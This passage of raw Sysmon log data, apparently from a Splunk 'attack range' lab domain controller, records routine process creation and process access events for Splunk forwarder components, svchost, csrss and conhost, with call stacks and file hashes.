Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.317{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.831{59A5CD1D-8F68-6005-F800-00000000A301}8844740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.691{59A5CD1D-8F68-6005-F800-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.159{59A5CD1D-8F68-6005-F700-00000000A301}44124384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F68-6005-F700-00000000A301}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:48.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 